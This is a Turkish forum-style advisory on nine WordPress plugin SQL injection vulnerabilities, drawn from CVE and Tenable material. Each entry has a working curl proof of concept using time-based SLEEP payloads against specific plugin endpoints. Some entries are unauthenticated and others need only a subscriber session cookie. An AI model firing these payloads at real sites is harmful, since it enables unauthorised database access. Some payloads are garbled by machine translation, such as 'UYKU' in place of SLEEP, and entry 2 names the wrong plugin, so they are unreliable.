Wordpress Pluginleri Hakkında Uyarı [Plugin SQL Açıkları] CVE
Referansı: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions
Etkilenen Sürümler: < 2.9.8
CVSSv3 Vektör: CVSS:3.1/AV:N/AC: L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Puanı: 9,8
Eklenti, bir SQL ifadesinde kullanılmadan önce /pmpro/v1/order REST yolundaki 'code' parametresinden kaçmaz, bu da kimliği doğrulanmamış bir SQL enjeksiyon güvenlik açığına yol açar.
TARGET_HOST, Paid Memberships Pro'nun kurulu olduğu wordpress ana bilgisayarının adresi olduğunda, aşağıdaki kavram kanıtı, SQL enjeksiyonunu göstermek için SLEEP işlevini kullanır. Uykuya iletilen değerin değiştirilmesi, isteğin geri dönmesinin ne kadar süreceğini değiştirecektir.
Kod:
curl "http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)--%20-"
Örneğin, bunu "time" komutuyla iki kez çalıştırmak, yanıt sürelerindeki farkı gösterecektir:
Kod:
time curl "http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(1)))a)--%20-"
{}
real 0m3.068s
user 0m0.006s
sys 0m0.009s
time curl "http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)--%20-"
{}
real 0m6.095s
user 0m0.006s
sys 0m0.009s
2.CVE-2023-23489 - Kimliği Doğrulanmamış SQL Enjeksiyon
Referansı: Easy Digital Downloads – Simple eCommerce for Selling Digital Files
Etkilenen Sürümler: 3.1.0.2 ve 3.1.0.3
CVSSv3 Vektör: CVSS:3.1/AV: N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Puanı: 9,8
Eklenti, bir SQL ifadesinde kullanılmadan önce 'edd_download_search' eylemindeki 's' parametresinden kaçmaz, bu da kimliği doğrulanmamış bir SQL enjeksiyon güvenlik açığına yol açar.
Kodun savunmasız kısmı './includes/ajax-functions.php' dosyasının 'edd_ajax_download_search()' işlevine karşılık gelir.
TARGET_HOST, Paid Memberships Pro'nun kurulu olduğu wordpress ana bilgisayarının adresi olduğunda, aşağıdaki kavram kanıtı, SQL enjeksiyonunu göstermek için SLEEP işlevini kullanır. Uykuya iletilen değerin değiştirilmesi, isteğin geri dönmesinin ne kadar süreceğini değiştirecektir.
Kod:
curl "http://TARGET_HOST/wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-"
3.CVE-2023-23490 - Kimliği Doğrulanmış SQL Enjeksiyon
Referansı: Survey Maker – Best WordPress Survey Plugin
Etkilenen Sürümler: < 3.1.2
CVSSv3 Vektör: CVSS:3.1/AV:N/AC:L/PR :L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Puanı: 8,8
Eklenti, bir SQL ifadesinde kullanılmadan önce 'ays_surveys_export_json' işlemindeki 'surveys_ids' parametresinden kaçmıyor ve bu da kimliği doğrulanmış bir SQL enjeksiyon güvenlik açığına yol açıyor.
Güvenlik açığı, saldırganın kimliğinin doğrulanmasını gerektirir ancak yönetici ayrıcalıklarına gerek duymaz; aşağıdaki örnekte 'abone' ayrıcalık düzeyine sahip bir hesap kullanılmaktadır.
Sorunu göstermek için basit bir curl komutu kullanılabilir (geçerli/geçerli bir WP oturum çerezi gerektirse de). Aşağıdaki kavram kanıtında, oturum açmış bir WP kullanıcısı için $TARGET_HOST'u hedef wordpress örneğiyle ve $WP_COOKIE'yi tam çerez başlığıyla (yani "Çerez: wordpress_xyz...") değiştirin.
Kod:
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --header "$WP_COOKIE" --data "action=ays_surveys_export_json&surveys_ids[0]=1)+AND+(SELECT+1+FROM+(SELECT( UYKU(3)))a)--+-"
4.CVE-2023-26325 - Kimliği Doğrulanmış SQL Enjeksiyon
Referansı: ReviewX – Multi-criteria Rating & Reviews for WooCommerce
Etkilenen Sürümler: <= 1.6.6
CVSSv3 Vektörü: CVSS:3.1/AV:N/AC:L/PR: L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Puanı: 8,8
Eklenti, bir SQL ifadesinde kullanılmadan önce rx_export_review eylemindeki 'filterValue' veya 'selectedColumns' parametrelerinden kaçmaz, bu da SQL enjeksiyonuna yol açar.
Güvenlik açığı, saldırganın kimliğinin doğrulanmasını gerektirir ancak yönetici ayrıcalıklarına gerek duymaz; aşağıdaki örnekte 'abone' ayrıcalık düzeyine sahip bir hesap kullanılmaktadır.
Sorunu göstermek için basit bir curl komutu kullanılabilir (geçerli/geçerli bir WP oturum çerezi gerektirse de). Aşağıdaki kavram kanıtında, oturum açmış bir WP kullanıcısı için $TARGET_HOST'u hedef wordpress örneğiyle ve $WP_COOKIE'yi tam çerez başlığıyla (yani "Çerez: wordpress_xyz...") değiştirin
Kod:
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --header "$WP_COOKIE" --data "action=rx_export_review&filterValue[0]=&filterValue[1]=&filterValue[2]=&filterValue[3]=&filterValue[4]=all&filterValue[5]=&filterValue[6]=aaaa&filterValue[7]=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&filterValue[8]=desc&selectedColumns[0]=id"
5.CVE-2023-28659 - Kimliği Doğrulanmış SQL Enjeksiyon
Referansı: Waiting: One-click countdowns
Etkilenen Sürümler: <= 0.6.2
CVSSv3 Vektör: CVSS:3.1/AV:N/AC :L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Puanı: 8,8
pbc_save_downs eyleminin pbc_down [meta][id] parametresi SQL enjeksiyonuna karşı savunmasızdır. Güvenlik açığı, saldırganın kimliğinin doğrulanmasını gerektirir ancak yönetici ayrıcalıklarına gerek duymaz; aşağıdaki örnekte 'subscriber' ayrıcalık düzeyine sahip bir hesap kullanılmaktadır.
Sorunu göstermek için basit bir curl komutu kullanılabilir (geçerli/geçerli bir WP oturum çerezi gerektirse de). Aşağıdaki kavram kanıtında, oturum açmış bir WP kullanıcısı için $TARGET_HOST'u hedef wordpress örneğiyle ve $WP_COOKIE'yi tam çerez başlığıyla (yani "Çerez: wordpress_xyz...") değiştirin.
Kod:
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --header "$WP_COOKIE" --data "action=pbc_save_downs&pbc_down[meta][id]=1+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)--"
6.CVE-2023-28660 - Kimliği Doğrulanmış SQL Enjeksiyon
Referansı: Events Made Easy
Etkilenen Sürümler: <= 2.3.14
CVSSv3 Vektör: CVSS:3.1/AV:N/ AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Puanı: 8,8
Eklenti , bir SQL ifadesinde kullanılmadan önce eme_recurrences_list eylemindeki ' search_name ' parametresinden kaçmaz ve bu da SQL enjeksiyon güvenlik açığına yol açar. Güvenlik açığı, saldırganın kimliğinin doğrulanmasını gerektirir ancak yönetici ayrıcalıklarına gerek duymaz; aşağıdaki örnekte 'abone' ayrıcalık düzeyine sahip bir hesap kullanılmaktadır.
Sorunu göstermek için basit bir curl komutu kullanılabilir (geçerli/geçerli bir WP oturum çerezi gerektirse de). Aşağıdaki kavram kanıtında, oturum açmış bir WP kullanıcısı için $TARGET_HOST'u hedef wordpress örneğiyle ve $WP_COOKIE'yi tam çerez başlığıyla (yani "Çerez: wordpress_xyz...") değiştirin.
Kod:
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php?action=eme_recurrences_list&search_name=1'{+}AND{+}(SELECT+1+FROM+(SELECT(SLEEP(0.5)))a)-{-}+{-}" --header "$WP_COOKIE"
7.CVE-2023-28661 - Kimliği Doğrulanmış SQL Enjeksiyon
Referansı: WP Popup Banners
Etkilenen Sürümler: <= 1.2.5
CVSSv3 Vektör: CVSS:3.1/AV:N/ AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Puanı: 8,8
Eklenti , bir SQL ifadesinde kullanılmadan önce get_popup_data eylemindeki ' value ' parametresinden kaçmaz ve bu da SQL enjeksiyon güvenlik açığına yol açar. Güvenlik açığı, saldırganın kimliğinin doğrulanmasını gerektirir ancak yönetici ayrıcalıklarına gerek duymaz; aşağıdaki örnekte 'subscriber' ayrıcalık düzeyine sahip bir hesap kullanılmaktadır.
Sorunu göstermek için basit bir curl komutu kullanılabilir (geçerli/geçerli bir WP oturum çerezi gerektirse de). Aşağıdaki kavram kanıtında, oturum açmış bir WP kullanıcısı için $TARGET_HOST'u hedef wordpress örneğiyle ve $WP_COOKIE'yi tam çerez başlığıyla (yani "Çerez: wordpress_xyz...") değiştirin
Kod:
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --header "$WP_COOKIE" --data "action=get_popup_data&value=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(1)) ))A)"
8.CVE-2023-28662 - Kimliği Doğrulanmamış SQL Enjeksiyon
Referansı: Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported)
Etkilenen Sürümler: <= 4.3.1
CVSSv3 Vektör: CVSS:3.1/AV :N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSSv3
Puanı: 9,8
Eklenti , bir SQL ifadesinde kullanılmadan önce wpgv_doajax_voucher_pdf_save_func eylemindeki ' template ' parametresinden kaçmaz ve bu da SQL enjeksiyon güvenlik açığına yol açar. Güvenlik açığının tetiklenmesi için kimlik doğrulaması gerekmiyor.
Sorunu göstermek için basit bir curl komutu kullanılabilir (geçerli/geçerli bir WP oturum çerezi gerektirse de). Aşağıdaki kavram kanıtında, oturum açmış bir WP kullanıcısı için $TARGET_HOST'u hedef wordpress örneğiyle ve $WP_COOKIE'yi tam çerez başlığıyla (yani "Cookie: wordpress_xyz...") değiştirin ve burada $BASE64_INJECTION base64'tür. kodlanmış SQL enjeksiyonu, örneğin:
LTEgT1IgU0xFRVAoMik= -1 OR SLEEP(2) anlamına gelir.
Kod:
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --data "action=wpgv_doajax_voucher_pdf_save_func&template=$BASE64_INJECTION"
veya payload yükleyebilirsin
Kod:
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --data "action=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoMik="
9.CVE-2023-28663 - Doğrulanmış SQL Enjeksiyon
Referansı: Formidable PRO2PDF
Etkilenen Sürümler: < 3.11
CVSSv3 Vektör: CVSS:3.1/AV:N/AC:L/ PR:L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Puanı: 8,8
Eklenti , bir SQL ifadesinde kullanılmadan önce fpropdf_export_file eylemindeki ' fieldmap ' parametresinden kaçmaz , bu da SQL enjeksiyon güvenlik açığına yol açar. Güvenlik açığı, saldırganın kimliğinin doğrulanmasını gerektirir ancak yönetici ayrıcalıklarına gerek duymaz; aşağıdaki örnekte 'subscriber' ayrıcalık düzeyine sahip bir hesap kullanılmaktadır.
Kavram kanıtı:
Sorunu göstermek için basit bir curl komutu kullanılabilir (geçerli/geçerli bir WP oturum çerezi gerektirse de). Aşağıdaki kavram kanıtında, oturum açmış bir WP kullanıcısı için $TARGET_HOST'u hedef wordpress örneğiyle ve $WP_COOKIE'yi tam çerez başlığıyla (yani "Çerez: wordpress_xyz...") değiştirin.
Kod:
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --header "$WP_COOKIE" --data "action=fpropdf_export_file&fieldmap=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(1)) ))A)"
Konumu Okuduğunuz İçin Teşekkür Ederim
Yararlandığım Kaynaklar :
1.Wordpress Şirketi
2.Tenable Siber Güvenlik Şirketi
Yararlandığım Kaynaklar :
1.Wordpress Şirketi
2.Tenable Siber Güvenlik Şirketi